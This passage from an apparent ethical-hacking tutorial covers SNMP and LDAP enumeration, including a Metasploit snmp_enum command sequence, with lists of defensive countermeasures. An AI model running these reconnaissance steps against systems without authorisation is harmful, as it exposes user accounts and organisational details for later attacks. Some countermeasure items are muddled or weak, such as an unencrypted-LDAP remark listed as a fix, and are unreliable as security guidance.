If you absolutely must keep NetBIOS, then watch out for default share names. In some versions of Windows, C$ and ADMIN$ are well-known names and should be avoided if possible.


SNMP Enumeration

SNMP (Simple Network Management Protocol) is an application layer protocol that uses UDP to monitor and manage routers, hubs, switches and other network devices on an IP network. SNMP is a very common protocol found enabled on a range of operating systems such as Windows Server, Linux and UNIX servers, as well as network devices such as routers and switches.


SNMP enumeration is used to enumerate user accounts, passwords, groups, system names and devices on a target system.


For SNMP enumeration the best tool to use is the Metasploit Framework,
with the snmp_enum module:

msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > show actions
   ...actions...
msf auxiliary(snmp_enum) > set ACTION <action-name>
msf auxiliary(snmp_enum) > show options
   ...show and set options...
msf auxiliary(snmp_enum) > run

Countermeasures:


  1. Remove or disable SNMP agents on hosts.
  2. Block port 161 at all perimeter network access devices.
  3. Restrict access to specific IP addresses.
  4. Use SNMPv3 (more secure).
  5. Implement the Group Policy security option called "Additional restrictions for all anonymous connections".
  6. Restrict access to null session pipes and null session shares, and use IPsec filtering.


LDAP Enumeration

The Lightweight Directory Access Protocol is a protocol used to access directory listings within Active Directory or other directory services. A directory is usually organized in a hierarchical and logical format, much like the levels of management and employees in a company. LDAP tends to be tied into the Domain Name System to allow integrated quick lookups and fast resolution of queries. LDAP generally runs on port 389 and, like other protocols, conforms to a defined set of rules (RFCs). It is possible to query the LDAP service, sometimes anonymously, and obtain a great deal of information that can give the tester valid usernames, addresses and departmental details usable in a brute-force or social-engineering attack.

Tools: 

LDAP Admin Tool - http://www.ldapsoft.com

Countermeasures: 

  1. Use NTLM or Basic authentication to limit access to known users only, so that nobody gains unauthorized access.
  2. By default, LDAP traffic is transmitted without encryption.
  3. Use SSL/TLS to encrypt the traffic.
  4. Choose usernames that differ from email addresses to make attacks harder, and enable account lockout after a number of failed attempts.

Conclusion 


In the scanning phase we scanned all the ports and found out which services and versions were running. In this post we have seen how to enumerate those services and gather the information we need for vulnerability analysis and exploitation.
So the point is that it is not scanning and enumeration; it is scanning with enumeration.

These enumeration techniques are used by ethical hackers, bug bounty hunters and cybersecurity experts.

Happy hacking.
